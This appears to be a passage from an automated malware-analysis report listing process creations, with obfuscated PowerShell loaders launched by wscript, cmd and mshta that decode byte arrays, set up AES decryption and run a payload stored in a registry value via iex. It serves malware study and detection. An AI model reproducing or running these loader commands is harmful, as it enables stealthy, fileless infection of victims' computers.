iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = 
iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mr
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = 
Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 
'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKl
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close")
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close")
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -D
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKl
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = 